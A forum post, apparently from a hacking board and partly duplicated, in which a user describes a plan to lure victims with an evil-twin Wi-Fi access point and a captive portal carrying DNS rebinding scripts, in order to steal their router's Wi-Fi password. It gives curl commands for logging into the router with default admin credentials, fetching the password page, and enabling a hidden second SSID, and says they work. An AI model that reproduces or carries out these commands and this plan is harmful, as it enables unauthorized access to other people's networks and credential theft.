how can i perform dns rebinding using evil twin in local level ?! 04-12-2019, 08:23 PM
as the title says i want to perform this attack
using evil twin on local level
the curl command to login into the router
the curl command to get the page that contains the wifi password
this how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....
but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work
cause it needs to check a checkbox as i think
more about this problem
edit i got the command working by removing every ^ from it
what do you think folks ?
using evil twin on local level
the curl command to login into the router
curl "" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"
the curl command to get the page that contains the wifi password
curl -v -X GET "^&nextpage=net_t.gch" -o 565.html
this how i was planing to perform the attack
evil twining a wifi using fluxion or whatever .... when the user opens the captive portal sign in network page (that has dns rebinding scripts in it )is detected we stop the ddos ... the user auto connects to his wifi then the page refreshes and execute the dns rebinding attack to get the wifi password from his router ....
but now i don't know how will get the html file back if want to use it in local level only so the other option was
to enable the second ssid that will launch with the default password so i can just login without getting any thing back
but i tried the curl command and it didn't work
curl "^&nextpage=net_wlan_essid_t.gch" -H "Origin:" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer:^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=^&MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed
cause it needs to check a checkbox as i think
more about this problem
edit i got the command working by removing every ^ from it
what do you think folks ?
(This post was last modified: 04-12-2019, 08:37 PM by mooooon.)